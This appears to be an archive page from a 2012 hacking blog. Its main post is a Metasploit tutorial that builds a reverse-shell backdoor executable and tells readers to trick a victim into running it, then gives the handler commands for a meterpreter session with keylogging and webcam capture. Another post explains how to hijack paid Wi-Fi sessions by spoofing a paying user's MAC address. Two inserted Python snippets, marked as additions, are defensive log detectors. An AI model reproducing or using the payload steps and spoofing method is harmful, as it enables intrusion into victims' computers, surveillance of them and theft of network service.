Thursday, 22 March 2012

Hack Windows 7 with Metasploit

In this tutorial I will exploit a Windows 7 SP1 machine using Metasploit. I will be using the exploit/multi/handler module, which “provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework”.
Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:


msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe


I used port 4444 for LPORT, the listening port (you can choose your own port), and set LHOST to the IP of the remote attacker, which is your local IP address. My IP is 192.168.10.5.





After that, you should see a file named backdoor.exe in /root. Send the file to the victim by using your Social Engineering skills and let him click the file. You can change the name of the file so that it is not that obvious.


Launch Metasploit and set the exploit by typing these commands in your msfconsole:




use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.5
set lport 4444
exploit 




If all goes well, you should be able to establish a meterpreter session. Type sysinfo to gather some info on the machine. To see the other meterpreter commands, type help. There are also meterpreter commands for capturing a screenshot of the PC, recording keystrokes, capturing a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.
[It's cool to take a screenshot with the meterpreter command screenshot.]
Regards:
 Akash Soni
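From the defender's side, the session described above shows up as an executable in a user-writable folder opening an outbound TCP connection to the handler's LHOST and LPORT. The following is an added example, not part of the original post: the log format, file names and the allowed-port policy are assumptions, and the events are constructed.

```python
import ntpath

# Constructed events, loosely modelled on Sysmon Event ID 3 (network connection)
# fields. They are illustrative, not real telemetry.
SAMPLE_EVENTS = [
    r"Image=C:\Program Files\Mozilla Firefox\firefox.exe|DestinationIp=203.0.113.10|DestinationPort=443|Initiated=true",
    r"Image=C:\Users\bob\Downloads\invoice.exe|DestinationIp=192.168.10.5|DestinationPort=4444|Initiated=true",
    r"Image=C:\Users\bob\Desktop\photo_viewer.exe|DestinationIp=192.168.10.5|DestinationPort=443|Initiated=true",
    r"Image=C:\Windows\System32\svchost.exe|DestinationIp=192.168.10.1|DestinationPort=53|Initiated=true",
]

USER_WRITABLE = ("\\downloads\\", "\\desktop\\", "\\appdata\\", "\\temp\\")
ALLOWED_EGRESS_PORTS = {53, 80, 443}  # assumption: this site's egress policy


def parse_event(line):
    """Split 'key=value|key=value' into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def classify(event):
    """Return 'high', 'review' or None for one connection event."""
    image = event["Image"].lower()
    if event["Initiated"] != "true":
        return None
    if not any(part in image for part in USER_WRITABLE):
        return None
    # The listener port is chosen by whoever runs the handler, so the port only
    # raises severity; the path signal alone still produces a finding.
    if int(event["DestinationPort"]) in ALLOWED_EGRESS_PORTS:
        return "review"
    return "high"


def find_suspicious(lines):
    findings = []
    for line in lines:
        event = parse_event(line)
        severity = classify(event)
        if severity:
            findings.append((severity, ntpath.basename(event["Image"]),
                             event["DestinationIp"], int(event["DestinationPort"])))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_EVENTS):
        print(finding)
```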

Saturday, 7 January 2012

How to find a vulnerable Website?

Website security is a major problem today and should be a priority for any organization or webmaster. Nowadays hackers concentrate a lot of their efforts on finding holes in web applications. If you are a website owner with a high PageRank and high traffic, there is a chance that you might become a victim of these hackers.
A few years back there were no proper tools to search for vulnerabilities, but nowadays there are tons of tools available through which even a newbie can find a vulnerable site and start hacking.

Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:


1. SQL Injection
2. XSS (Cross Site Scripting)
3. Remote File Inclusion (RFI)
4. Directory Traversal attack
5. Local File Inclusion (LFI)
6. DDoS attack




By: Akash Soni

Friday, 6 January 2012

Hacking & Network Security: What Is It Exactly (For Noobs)

It is not strange to call this generation the “intelligent” generation, the era of computers & internet. Humans are connected to each other through the world of computers spread over a network.
Essentially, in technical language, computers communicate with each other through a network. So any data communication between 2 or more computers involves the transfer and sharing of vital data. The basic idea of networks is to allow people remote access to geographically distant resources without having to be physically present. They have also been designed to send data back and forth, to stay connected.
There are large networks and small networks, but size is irrelevant in terms of the importance of network security. The purpose of network security, quite simply, is to protect the network and its component parts from unauthorized access and misuse. Networks are vulnerable because of their inherent characteristic of facilitating remote access. For example, if a hacker wanted to access a computer not on a network, physical access would be vital. However, with networks in the picture, it is possible to bypass that particular security aspect. Therefore, it is vital for any network administrator, regardless of the size and type of network, to implement stringent security policies to prevent potential losses.
The networks are computer networks, both public and private, that are used every day to conduct transactions and communications among businesses, government agencies and individuals. Today, most companies’ host computers can be accessed by their employees whether in their offices over a private communications network, or from their homes or hotel rooms while on the road through normal telephone lines.
Network security involves all activities that organizations, enterprises, and institutions undertake to protect the value and ongoing usability of assets and the integrity and continuity of operations. An effective network security strategy requires identifying threats and then choosing the most effective set of tools to combat them. Often important data is transferred from one computer system to another over the network. Network security safeguards the data communication so that vital information is secured.
Whenever the term network security appears, it appears in conjunction with another popular buzzword, “ethical hacking”. The word “ethical” has special meaning, as ethical hacking is very closely related to network security & is simply the use of programming skills to determine vulnerabilities in computer systems. Performed by special computer programming experts or hackers, it is vital for computers connected over a network. With increasing use of the Internet and concerns about its security, especially when it comes to things like consumer information or private medical details, there is considerable need for computer experts to work in ethical hacking.
This is a guest post, and the following is the author bio: Internet hacking is accessing a secure computer system by disabling or bypassing the security through the internet. There are many ethical hacking tutorials available with which one can learn the ways of detecting the loopholes in cyber security.

What Exactly is Session Hijacking in Hacking?

Session hijacking is a method widely used by hackers for temporarily stealing network connections or login sessions. You might have heard this term used a lot by hackers & some of you have emailed me to explain it in brief.

So this post will explain what exactly session hijacking is, & I have written another one on hacking a wireless hotspot using session hijacking step by step for understanding the concept.

What is Session

We see a lot of wireless network services offering Wi-Fi on a pay-per-use model, where you have to pay for usage; it costs really high but gives you high-speed connectivity.

Every user that pays for the service gets connected. The unique MAC address of his laptop/netbook is stored in the service provider's database for every paid user. Every time he connects to the paid network, it creates a session and a session ID.

Any other user, without an authenticated MAC address and session, gets no connectivity. So this unique connection between the user & the wireless connectivity provider is the session.

Black hat hackers have been using this technique for a long time to get unauthorized access to paid Wi-Fi networks.

What is Session Stealing

In session hijacking we create a fake MAC address on our network interface & replace the original one with it using a MAC changer utility. The fake MAC address that we use is that of a certain user who is on the network & has already paid for the wireless network usage.

So we spoof the MAC address & let the network identify us through his MAC address as an authenticated user. This is what we call Session Stealing or Hijacking.
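Because the session described above is keyed only to the MAC address, a hotspot operator can look for one paid MAC being used by two devices at once. The following is an added example, not part of the original post: the log layout, access point names, hostnames and the 120-second window are assumptions, and the records are constructed.

```python
from collections import defaultdict

# Constructed association log: (seconds, client MAC, access point, DHCP hostname).
SAMPLE_LOG = [
    (0,   "aa:bb:cc:00:11:22", "ap-lobby", "alice-laptop"),
    (30,  "de:ad:be:ef:00:01", "ap-cafe",  "carol-phone"),
    (60,  "aa:bb:cc:00:11:22", "ap-lobby", "alice-laptop"),
    (75,  "aa:bb:cc:00:11:22", "ap-cafe",  "netbook-7"),
    (90,  "aa:bb:cc:00:11:22", "ap-lobby", "alice-laptop"),
    (400, "de:ad:be:ef:00:01", "ap-lobby", "carol-phone"),
]


def find_shared_macs(log, window=120):
    """Return {mac: [reasons]} for MACs that look like two devices at once."""
    by_mac = defaultdict(list)
    for ts, mac, ap, host in sorted(log):
        by_mac[mac].append((ts, ap, host))

    findings = {}
    for mac, seen in by_mac.items():
        reasons = set()
        for i, (ts, ap, host) in enumerate(seen):
            recent = [s for s in seen[:i] if ts - s[0] <= window]
            # Same MAC announcing a different DHCP hostname inside the window.
            if any(h != host for _, _, h in recent):
                reasons.add("hostname-conflict")
            # A -> B -> A inside the window: two radios, not one roaming client.
            aps = [a for _, a, _ in recent] + [ap]
            if any(aps[j] == aps[j + 2] != aps[j + 1]
                   for j in range(len(aps) - 2)):
                reasons.add("ap-ping-pong")
        if reasons:
            findings[mac] = sorted(reasons)
    return findings


if __name__ == "__main__":
    print(find_shared_macs(SAMPLE_LOG))
```

Tying the session to per-user credentials (for example 802.1X with WPA2-Enterprise) instead of the MAC address alone removes the condition this check looks for.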

Thursday, 5 January 2012